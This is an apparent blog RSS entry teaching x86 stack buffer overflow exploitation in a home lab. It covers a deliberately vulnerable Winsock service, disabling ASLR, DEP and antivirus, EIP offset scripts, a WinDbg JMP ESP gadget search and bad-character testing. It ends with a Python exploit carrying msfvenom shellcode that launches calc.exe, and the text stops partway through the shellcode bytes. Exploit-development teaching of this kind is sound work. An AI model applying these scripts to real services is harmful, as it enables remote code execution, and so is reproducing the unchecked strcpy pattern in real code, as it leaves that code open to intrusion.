<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Assembly on 4w4647's Blog</title><link>https://4w4647.github.io/tags/assembly/</link><description>Recent content in Assembly on 4w4647's Blog</description><image><title>4w4647's Blog</title><url>https://4w4647.github.io/img/avatar.jpeg</url><link>https://4w4647.github.io/img/avatar.jpeg</link></image><generator>Hugo</generator><language>en</language><lastBuildDate>Thu, 30 Apr 2026 08:12:33 +0545</lastBuildDate><atom:link href="https://4w4647.github.io/tags/assembly/index.xml" rel="self" type="application/rss+xml"/><item><title>Stack Buffer Overflows - EIP Control to Code Execution</title><link>https://4w4647.github.io/posts/stack-buffer-overflows-eip-control-to-code-execution/</link><pubDate>Thu, 30 Apr 2026 08:12:33 +0545</pubDate><guid>https://4w4647.github.io/posts/stack-buffer-overflows-eip-control-to-code-execution/</guid><description>A technical breakdown of x86 stack buffer overflow exploitation against a network service - EIP hijacking, JMP ESP gadget selection, bad character enumeration, shikata_ga_nai decoder mechanics, and shellcode delivery.</description><content:encoded><![CDATA[<h2 id="lab-setup">Lab Setup</h2>
<p>Three things need to be sorted on the Windows lab machine before any of this works cleanly.</p>
<p><strong>Antivirus off.</strong> Shellcode and exploit scripts will be flagged and quarantined before they ever run. Real-time protection, tamper protection, SmartScreen, all of it needs to go. Turn off tamper protection first, then real-time protection. If you do it the other way around, Defender re-enables itself.</p>
<p><strong>ASLR disabled system-wide.</strong> Windows randomizes module base addresses by default, which means every time the program runs, the modules load at different addresses. For foundational exploit development you need those addresses to stay the same between runs so any gadget address you hardcode in a payload is still valid the next time. This registry key forces that:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-cmd" data-lang="cmd"><span class="line"><span class="cl">reg add <span class="s2">&#34;HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management&#34;</span> /v MoveImages /t REG_DWORD /d 0 /f
</span></span></code></pre></div><p>Reboot after applying it.</p>
<p><strong>DEP disabled for the target binary.</strong> Data Execution Prevention marks stack memory as non-executable at the OS level. If it is enabled, the CPU will refuse to execute code sitting on the stack even if you redirect execution there perfectly. For this lab the binary gets compiled without NX compatibility so the stack stays executable. In real targets this protection gets bypassed with ROP chains rather than compiled away, but that comes later.</p>
<hr>
<h2 id="the-vulnerable-service">The Vulnerable Service</h2>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl"><span class="cp">#include</span> <span class="cpf">&lt;winsock2.h&gt;</span><span class="cp">
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">vulnerable</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">input</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">    <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;[*] Copying input into buf[64]...</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">strcpy</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">input</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;[+] Done. You entered: %s</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="n">WSADATA</span> <span class="n">wsa</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="n">SOCKET</span> <span class="n">s</span><span class="p">,</span> <span class="n">client</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="n">server</span><span class="p">,</span> <span class="n">addr</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="kt">int</span> <span class="n">addrlen</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addr</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="kt">char</span> <span class="n">input</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">WSAStartup</span><span class="p">(</span><span class="nf">MAKEWORD</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">2</span><span class="p">),</span> <span class="o">&amp;</span><span class="n">wsa</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="n">s</span> <span class="o">=</span> <span class="nf">socket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">server</span><span class="p">.</span><span class="n">sin_family</span>      <span class="o">=</span> <span class="n">AF_INET</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="n">server</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span> <span class="o">=</span> <span class="n">INADDR_ANY</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="n">server</span><span class="p">.</span><span class="n">sin_port</span>        <span class="o">=</span> <span class="nf">htons</span><span class="p">(</span><span class="mi">4444</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">bind</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">server</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">server</span><span class="p">));</span>
</span></span><span class="line"><span class="cl">    <span class="nf">listen</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;[*] Listening on port 4444...</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">client</span> <span class="o">=</span> <span class="nf">accept</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">addr</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">addrlen</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;[+] Connection accepted</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">recv</span><span class="p">(</span><span class="n">client</span><span class="p">,</span> <span class="n">input</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">input</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">printf</span><span class="p">(</span><span class="s">&#34;[*] Received input, passing to vulnerable()</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">vulnerable</span><span class="p">(</span><span class="n">input</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nf">closesocket</span><span class="p">(</span><span class="n">client</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nf">WSACleanup</span><span class="p">();</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>The vulnerability is in <code>vulnerable()</code>. The line <code>strcpy(buf, input)</code> copies whatever came in over the network into a 64-byte buffer with no length check whatsoever. <code>strcpy</code> keeps copying bytes until it hits a null byte in the source, regardless of how large the destination is. Send more than 64 bytes and it writes straight past the end of <code>buf</code> into whatever memory sits above it on the stack.</p>
<p>What sits above it turns out to be the saved base pointer and then the return address. And that is where things get interesting.</p>
<p>Compiled from Linux with protections stripped:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">i686-w64-mingw32-gcc -o vuln.exe vuln.c <span class="se">\
</span></span></span><span class="line"><span class="cl">    -fno-stack-protector <span class="se">\
</span></span></span><span class="line"><span class="cl">    -mpreferred-stack-boundary<span class="o">=</span><span class="m">2</span> <span class="se">\
</span></span></span><span class="line"><span class="cl">    -lws2_32 <span class="se">\
</span></span></span><span class="line"><span class="cl">    -Wl,--disable-nxcompat
</span></span></code></pre></div><p>What each flag does:</p>
<ul>
<li><code>-fno-stack-protector</code> disables stack canaries. These are values the compiler inserts between the buffer and the return address that get checked before the function returns. If they are corrupted, the process aborts before <code>ret</code> even executes.</li>
<li><code>-mpreferred-stack-boundary=2</code> uses 4-byte stack alignment instead of 16-byte. Keeps the frame layout clean and predictable.</li>
<li><code>-lws2_32</code> links the Windows Sockets library for the network code.</li>
<li><code>-Wl,--disable-nxcompat</code> tells the linker to mark the binary as not requiring DEP. Without this flag, DEP applies and the stack is non-executable.</li>
</ul>
<hr>
<h2 id="the-stack-frame">The Stack Frame</h2>
<p>Before calculating offsets there needs to be a clear picture of what the stack looks like when <code>vulnerable()</code> is running.</p>
<p>When <code>main()</code> calls <code>vulnerable(input)</code>, the cdecl calling convention applies. The caller pushes the argument (a 4-byte pointer to <code>input</code>) onto the stack, then executes <code>CALL</code>. The <code>CALL</code> instruction pushes the return address (the address of the next instruction in <code>main</code>) and jumps to <code>vulnerable</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">push</span> <span class="nv">input_pointer</span>      <span class="c1">; 4-byte pointer to input buffer</span>
</span></span><span class="line"><span class="cl"><span class="nf">call</span> <span class="nv">vulnerable</span>         <span class="c1">; pushes return address, jumps to function</span>
</span></span></code></pre></div><p>Inside <code>vulnerable()</code>, the prologue sets up the stack frame:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">push</span> <span class="nb">ebp</span>                <span class="c1">; save caller&#39;s base pointer</span>
</span></span><span class="line"><span class="cl"><span class="nf">mov</span> <span class="nb">ebp</span><span class="p">,</span> <span class="nb">esp</span>            <span class="c1">; anchor EBP to current stack top</span>
</span></span><span class="line"><span class="cl"><span class="nf">sub</span> <span class="nb">esp</span><span class="p">,</span> <span class="mi">64</span>             <span class="c1">; reserve 64 bytes for buf</span>
</span></span></code></pre></div><p>After the prologue finishes, the stack looks like this:</p>
<pre tabindex="0"><code>High Address
┌──────────────────┐
│  input pointer   │  [ebp+8]   argument pushed by caller
├──────────────────┤
│  return address  │  [ebp+4]   pushed by CALL
├──────────────────┤
│  saved EBP       │  [ebp]     EBP register points here
├──────────────────┤
│                  │
│    buf[64]       │            64 bytes of local buffer
│                  │
│                  │            ESP points here
└──────────────────┘
Low Address
</code></pre><p>The stack grows downward toward lower addresses. <code>buf</code> sits below saved EBP in memory. When <code>strcpy</code> writes into <code>buf</code>, it starts at the bottom of the buffer and fills upward, heading straight toward saved EBP and then the return address.</p>
<p>The offset math is straightforward:</p>
<pre tabindex="0"><code>64 bytes    buf itself
 4 bytes    saved EBP above buf
---------
68 bytes    total to reach the return address
</code></pre><p>Bytes at offset 68 through 71 overwrite the return address. When the function&rsquo;s epilogue runs and <code>ret</code> executes, it pops those 4 bytes into EIP. The CPU jumps to whatever address is there. Put a controlled address in those bytes and execution is hijacked.</p>
<hr>
<h2 id="how-the-epilogue-still-works">How the Epilogue Still Works</h2>
<p>The overflow writes <code>0x41414141</code> over the saved EBP value on the stack. A reasonable question is whether this breaks the epilogue before <code>ret</code> even fires.</p>
<p>The epilogue for <code>vulnerable()</code> is:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">mov</span> <span class="nb">esp</span><span class="p">,</span> <span class="nb">ebp</span>        <span class="c1">; collapse local frame, reset ESP</span>
</span></span><span class="line"><span class="cl"><span class="nf">pop</span> <span class="nb">ebp</span>             <span class="c1">; restore saved EBP from stack into EBP register</span>
</span></span><span class="line"><span class="cl"><span class="nf">ret</span>                 <span class="c1">; pop return address into EIP</span>
</span></span></code></pre></div><p>The key detail is that <code>mov esp, ebp</code> reads from the EBP <strong>register</strong>, not from the saved value on the stack. The EBP register was set during the prologue with <code>mov ebp, esp</code> and was never touched again during the function body. It still holds the correct address pointing at the saved EBP location on the stack.</p>
<p>So the epilogue runs correctly. <code>mov esp, ebp</code> resets ESP to the right place. <code>pop ebp</code> loads the corrupted <code>0x41414141</code> into the EBP register, which breaks the caller&rsquo;s frame, but by this point execution is being taken over so it does not matter. Then <code>ret</code> pops the overwritten return address into EIP and the CPU jumps there.</p>
<hr>
<h2 id="confirming-eip-control">Confirming EIP Control</h2>
<p>Theory needs to be verified. A quick script confirms the offset:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">socket</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;A&#34;</span> <span class="o">*</span> <span class="mi">68</span> <span class="o">+</span> <span class="sa">b</span><span class="s2">&#34;B&#34;</span> <span class="o">*</span> <span class="mi">4</span> <span class="o">+</span> <span class="sa">b</span><span class="s2">&#34;C&#34;</span> <span class="o">*</span> <span class="mi">100</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="n">s</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="s2">&#34;192.168.122.85&#34;</span><span class="p">,</span> <span class="mi">4444</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="n">s</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">s</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span></span></code></pre></div><p>68 <code>A</code>s to fill <code>buf</code> and overwrite saved EBP. 4 <code>B</code>s at offset 68 to land on the return address. 100 <code>C</code>s as padding.</p>
<p>WinDbg crash output:</p>
<pre tabindex="0"><code>(15cc.229c): Access violation - code c0000005 (second chance)
eax=00000066 ebx=019e0df8 ecx=00000000 edx=00df0000 esi=019e0e88 edi=00000059
eip=42424242 esp=0126f8c4 ebp=41414141 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
42424242 ??              ???
</code></pre><p>EIP is <code>42424242</code> which is <code>BBBB</code>. EBP is <code>41414141</code> which is <code>AAAA</code>. The offset is confirmed at 68 bytes.</p>
<p>There is something else worth noting in the crash output. ESP is sitting at <code>0126f8c4</code> and it is pointing directly at the <code>C</code>s. After <code>ret</code> pops the return address into EIP, ESP advances by 4 bytes and lands on whatever came immediately after the return address in the payload. That is attacker-controlled data sitting right at ESP. This is the mechanism that makes <code>JMP ESP</code> useful.</p>
<hr>
<h2 id="finding-a-jmp-esp-gadget">Finding a JMP ESP Gadget</h2>
<p>With EIP control confirmed, the next step is figuring out where to redirect execution. The goal is to execute shellcode, and the shellcode will be placed right after the overwritten return address in the payload. At the moment <code>ret</code> fires, ESP points directly at that shellcode.</p>
<p>So what is needed is an instruction somewhere in memory that says &ldquo;jump to whatever ESP points at.&rdquo; In x86, <code>JMP ESP</code> does exactly that. Its opcode is two bytes: <code>FF E4</code>.</p>
<p>The challenge is finding a copy of those two bytes at an address that is stable and predictable. If the address changes between runs, the hardcoded value in the payload becomes wrong and the exploit crashes. This is exactly why ASLR was disabled earlier.</p>
<p><strong>Step 1: Find out what modules are loaded.</strong></p>
<p>In WinDbg, the <code>lm</code> command lists all loaded modules with their start and end addresses:</p>
<pre tabindex="0"><code>0:000&gt; lm
start    end        module name
00400000 0043c000   vuln
75c80000 75d47000   msvcrt
75de0000 75ed0000   KERNEL32
77640000 7790a000   KERNELBASE
77950000 77b0f000   ntdll
</code></pre><p>Each line shows the start address, end address, and name of a loaded module. These are the regions of memory available to search for a gadget.</p>
<p><strong>Step 2: Calculate the search range.</strong></p>
<p>To search a module for <code>FF E4</code>, the <code>s</code> command in WinDbg needs a start address and a length. The length is calculated by subtracting the start address from the end address.</p>
<p>For <code>msvcrt</code>:</p>
<pre tabindex="0"><code>end   - start  = length
75d47000 - 75c80000 = c7000
</code></pre><p>So the search length for <code>msvcrt</code> is <code>0xc7000</code> bytes, which covers the entire module.</p>
<p><strong>Step 3: Search for the opcode.</strong></p>
<pre tabindex="0"><code>0:000&gt; s 0x75c80000 L0xc7000 ff e4
75d099fd  ff e4 00 00 57 e8 39 ee-fb ff 83 c4 14 8b bd 34
</code></pre><p>The <code>s</code> command syntax is <code>s &lt;start&gt; L&lt;length&gt; &lt;bytes&gt;</code>. WinDbg found <code>FF E4</code> at address <code>0x75d099fd</code> inside <code>msvcrt.dll</code>.</p>
<p><strong>Step 4: Verify it is actually JMP ESP.</strong></p>
<p>Finding the bytes is not enough. They need to be disassembled to confirm they form a valid instruction at that address:</p>
<pre tabindex="0"><code>0:000&gt; u 0x75d099fd L1
msvcrt!_winput_s_l+0xa5d:
75d099fd ffe4            jmp     esp
</code></pre><p>Confirmed. <code>0x75d099fd</code> contains <code>JMP ESP</code>.</p>
<p><strong>Step 5: Verify the address is stable.</strong></p>
<p>With ASLR disabled system-wide, restarting the program should load <code>msvcrt</code> at the same base address. Running <code>lm</code> across multiple sessions confirmed <code>msvcrt</code> consistently loading at <code>0x75c80000</code>, which means <code>0x75d099fd</code> is reliable.</p>
<p>One more check: the address itself must not contain any null bytes, because <code>strcpy</code> stops copying at <code>0x00</code>. Looking at <code>75 d0 99 fd</code>, there are no null bytes. The gadget address is clean.</p>
<hr>
<h2 id="little-endian-packing">Little-Endian Packing</h2>
<p>x86 is little-endian. Multi-byte values are stored in memory with the least significant byte at the lowest address. The address <code>0x75d099fd</code> does not go into the payload as-is. It gets stored reversed: <code>fd 99 d0 75</code>.</p>
<p>Python handles this with <code>struct.pack</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">struct</span>
</span></span><span class="line"><span class="cl"><span class="n">jmp_esp</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&#34;&lt;I&#34;</span><span class="p">,</span> <span class="mh">0x75d099fd</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="c1"># produces: b&#39;\xfd\x99\xd0\x75&#39;</span>
</span></span></code></pre></div><p>The <code>&lt;</code> means little-endian. <code>I</code> is an unsigned 32-bit integer. Getting the byte order wrong loads a garbage address into EIP and the exploit crashes with no obvious indication of the cause.</p>
<hr>
<h2 id="bad-character-enumeration">Bad Character Enumeration</h2>
<p><code>strcpy</code> stops at <code>0x00</code>. Any null byte anywhere in the payload truncates everything that follows it. Other byte values might also get corrupted depending on how the service processes input, and shellcode containing a corrupted byte will silently fail mid-execution.</p>
<p>The process for finding bad characters is to send every possible byte value through the vulnerability and compare what arrives on the stack against what was sent:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">socket</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">bad_chars</span> <span class="o">=</span> <span class="nb">bytes</span><span class="p">(</span><span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">256</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;A&#34;</span> <span class="o">*</span> <span class="mi">68</span> <span class="o">+</span> <span class="sa">b</span><span class="s2">&#34;B&#34;</span> <span class="o">*</span> <span class="mi">4</span> <span class="o">+</span> <span class="n">bad_chars</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">()</span>
</span></span><span class="line"><span class="cl"><span class="n">s</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="s2">&#34;192.168.122.85&#34;</span><span class="p">,</span> <span class="mi">4444</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="n">s</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="n">s</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span></span></code></pre></div><p>After the crash, <code>db esp L100</code> in WinDbg shows the raw bytes that landed on the stack. Comparing byte by byte against the expected sequence <code>01 02 03 ... fd fe ff</code> reveals any bytes that went missing or got changed.</p>
<p>For this target, every byte from <code>0x01</code> through <code>0xff</code> arrived intact. The only bad character is:</p>
<ul>
<li><code>0x00</code> — null terminator, kills <code>strcpy</code> immediately</li>
</ul>
<hr>
<h2 id="generating-shellcode">Generating Shellcode</h2>
<p>With bad characters confirmed, <code>msfvenom</code> generates shellcode that avoids them:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">msfvenom -p windows/exec <span class="nv">CMD</span><span class="o">=</span>calc.exe -b <span class="s2">&#34;\x00&#34;</span> -f python
</span></span></code></pre></div><pre tabindex="0"><code>Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
Payload size: 220 bytes
</code></pre><p><code>shikata_ga_nai</code> is a polymorphic XOR encoder. It wraps the shellcode in a self-decoding stub. When the shellcode runs, the decoder executes first. It XORs each encoded byte back to its original value and then jumps into the decoded shellcode. The encoded form sitting in the payload never actually contains the bad characters. They exist only in the decoded form that gets reconstructed at runtime in memory.</p>
<hr>
<h2 id="the-decoder-problem-and-the-fix">The Decoder Problem and the Fix</h2>
<p><code>shikata_ga_nai</code> uses ESP as scratch space while it is decoding. It pushes and pops temporary values relative to ESP as part of the XOR loop. After <code>JMP ESP</code> fires, ESP points at the very first byte of the shellcode. The decoder starts running and its scratch writes land on top of the encoded bytes it has not decoded yet. The shellcode corrupts itself before it finishes unpacking and crashes.</p>
<p>The fix is to create distance between ESP and the start of the shellcode before the decoder begins running.</p>
<p><strong>Option 1: NOP sled.</strong> Prepend <code>0x90</code> bytes before the shellcode. Each NOP is a single byte instruction that does nothing except advance EIP by one. ESP does not move. After sliding through 16 NOPs, EIP is pointing at the shellcode but ESP is still 16 bytes behind, sitting in the sled. When the decoder runs and writes scratch values relative to ESP, those writes land in the NOP sled area, which has already been executed and does not matter.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;A&#34;</span> <span class="o">*</span> <span class="mi">68</span> <span class="o">+</span> <span class="n">jmp_esp</span> <span class="o">+</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x90</span><span class="s2">&#34;</span> <span class="o">*</span> <span class="mi">16</span> <span class="o">+</span> <span class="n">buf</span>
</span></span></code></pre></div><p><strong>Option 2: sub esp prefix.</strong> Prepend <code>sub esp, 0x10</code> before the shellcode. This is the opcode <code>\x83\xec\x10</code>. It is a single 3-byte instruction that subtracts 16 from ESP, moving it 16 bytes below the shellcode. The decoder then has clean scratch space that does not overlap with the encoded payload at all.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;A&#34;</span> <span class="o">*</span> <span class="mi">68</span> <span class="o">+</span> <span class="n">jmp_esp</span> <span class="o">+</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x83\xec\x10</span><span class="s2">&#34;</span> <span class="o">+</span> <span class="n">buf</span>
</span></span></code></pre></div><p>Both approaches solve the same problem. The <code>sub esp</code> version costs 3 bytes instead of 16, which is worth knowing when buffer space is tight.</p>
<hr>
<h2 id="the-full-exploit">The Full Exploit</h2>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">socket</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">struct</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">sys</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">TARGET_IP</span>   <span class="o">=</span> <span class="s2">&#34;192.168.122.85&#34;</span>
</span></span><span class="line"><span class="cl"><span class="n">TARGET_PORT</span> <span class="o">=</span> <span class="mi">4444</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">exploit</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">    <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[*] Target     : </span><span class="si">{</span><span class="n">TARGET_IP</span><span class="si">}</span><span class="s2">:</span><span class="si">{</span><span class="n">TARGET_PORT</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[*] Gadget     : JMP ESP @ 0x75d099fd (msvcrt.dll)&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[*] Bad chars  : </span><span class="se">\\</span><span class="s2">x00&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[*] Encoder    : x86/shikata_ga_nai&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">jmp_esp</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&#34;&lt;I&#34;</span><span class="p">,</span> <span class="mh">0x75d099fd</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="c1"># msfvenom -p windows/exec CMD=calc.exe -b &#34;\x00&#34; -f python</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span>  <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\xda\xcf\xbf\xb9\x47\xc3\xec\xd9\x74\x24\xf4\x58</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x33\xc9\xb1\x31\x31\x78\x18\x03\x78\x18\x83\xe8</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x45\xa5\x36\x10\x5d\xa8\xb9\xe9\x9d\xcd\x30\x0c</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\xac\xcd\x27\x44\x9e\xfd\x2c\x08\x12\x75\x60\xb9</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\xa1\xfb\xad\xce\x02\xb1\x8b\xe1\x93\xea\xe8\x60</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x17\xf1\x3c\x43\x26\x3a\x31\x82\x6f\x27\xb8\xd6</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x38\x23\x6f\xc7\x4d\x79\xac\x6c\x1d\x6f\xb4\x91</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\xd5\x8e\x95\x07\x6e\xc9\x35\xa9\xa3\x61\x7c\xb1</span><span class="s2">&#34;</span>
